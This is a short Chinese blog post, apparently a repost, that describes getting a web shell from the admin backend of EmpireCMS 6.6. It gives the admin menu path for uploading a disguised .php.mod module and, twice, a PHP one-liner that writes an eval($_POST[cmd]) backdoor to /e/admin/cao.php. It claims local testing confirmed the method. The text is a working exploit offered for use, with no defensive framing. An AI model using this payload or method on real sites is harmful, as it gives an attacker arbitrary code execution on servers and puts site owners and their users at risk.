帝国cms 后台getshell

见http://www.wooyun.org/bugs/wooyun-2010-03787

以前6.5的有人发的方法是,(进入后台—系统设置—管理数据表—管理系统模型—导入新型模块,直接把修改过的php的shell改名为shell.php.mod上传,新版使用uploadm~num.php来递增数字)发现6.6不行,上传之后会变成类似uploadm1324885505nXmTdQamQq.php这样的!

换了个办法其实也很简单<?fputs(fopen("cao.php","w"),"<?eval(\$_POST[cmd]);?>")?> 保存为1.php.mod 然后还是进入后台—系统设置—管理数据表—管理系统模型—导入新型模块,上传之后马儿就躺在了/e/admin/cao.php了

本地6.6测试通过

<?fputs(fopen("cao.php","w"),"<?eval(\$_POST[cmd]);?>")?>

帝国cms 后台getshell

原创文章,作者:PWEWR,如若转载,请注明出处:http://www.wangzhanshi.com/n/10209.html

(0)
PWEWR的头像PWEWR
上一篇 2025年1月1日 16:55:23
下一篇 2025年1月1日 16:55:25

相关推荐

发表回复

登录后才能评论